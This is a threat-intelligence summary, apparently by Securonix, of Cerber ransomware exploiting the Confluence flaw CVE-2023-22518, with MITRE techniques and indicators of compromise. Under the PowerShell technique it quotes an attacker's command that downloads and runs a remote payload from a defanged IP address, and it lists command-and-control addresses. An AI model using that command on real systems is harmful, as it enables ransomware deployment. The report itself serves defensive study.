Threat Research

Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518

Securonix

Cerber ransomware exploits CVE-2023-22518 in Atlassian Confluence Data Center and Server to gain unauthorized admin privileges and deploy its payload. It uses an encoded PowerShell command to fetch the payload, encrypts files with the .L0CK3D extension, drops a ransom note, and even deploys Linux variants via a Bash script.

Keypoints

  • Cerber ransomware exploited CVE-2023-22518 in Confluence to gain unauthorized Confluence administrator privileges.
  • The vulnerability’s PoC was publicly leaked on November 2, 2023.
  • Attack chain includes an encoded PowerShell command to download and execute a remote payload.
  • The PowerShell script connects to a C2 server and downloads a malicious text file containing the payload.
  • The ransomware encrypts files and appends the .L0CK3D extension, and drops a ransom note named read-me3.txt.
  • A Linux variant is deployed via a Bash script (bapo.sh) downloaded from the same IP address.
  • Trend Micro identifies the sample as Cerber by comparing it to older Cerber patterns and ransom-site similarities.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of CVE-2023-22518 allowed unauthorized users to reset and create a Confluence administrator account. [‘exploiting this vulnerability allows unauthorized users to reset and create a Confluence instance administrator account’]
  • [T1059.001] PowerShell – Encoded PowerShell command to download and execute a remote payload. [‘powershell.exe -exec bypass -nop -enc IEX((New-Object Net.WebClient).DownloadString(hxxp://193.176[.]179[.]41/tmp.37))’]
  • [T1105] Ingress Tool Transfer – The PowerShell script will connect to the C2 server 193.187.172[.]73 and download a malicious text file. [‘The PowerShell script will connect to the command-and-control (C&C) server 193.187.172[.]73 and download a malicious text file.’]
  • [T1486] Data Encrypted for Impact – The decoded Cerber payload encrypts files and appends the .L0CK3D extension. [‘which will then encrypt the files in the system and append the extension “.L0CK3D”’]
  • [T1486] Data Encrypted for Impact – Ransom note is dropped (read-me3.txt) as part of impact activity. [‘It will also drop a ransom note with the filename “read-me3.txt” in all directories.’]
  • [T1059.004] Unix Shell – Linux Bash script deployment (bapo.sh) downloads and executes a Linux Cerber variant. [‘bapo.sh, which downloads and executes a Linux Cerber ransomware variant.’]

Indicators of Compromise

  • [IP Address] 193.176.179.41 – used in the encoded PowerShell command to fetch payload from a remote server
  • [IP Address] 193.187.172.73 – C2/server from which the malicious text file is downloaded
  • [File Name] read-me3.txt – ransom note dropped in all directories
  • [File Extension] .L0CK3D – extension appended to encrypted files
  • [File Name] bapo.sh – Linux Bash script downloaded from the same IP address to deploy a Linux Cerber variant

Read more: https://www.trendmicro.com/en_us/research/23/k/cerber-ransomware-exploits-cve-2023-22518.html

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint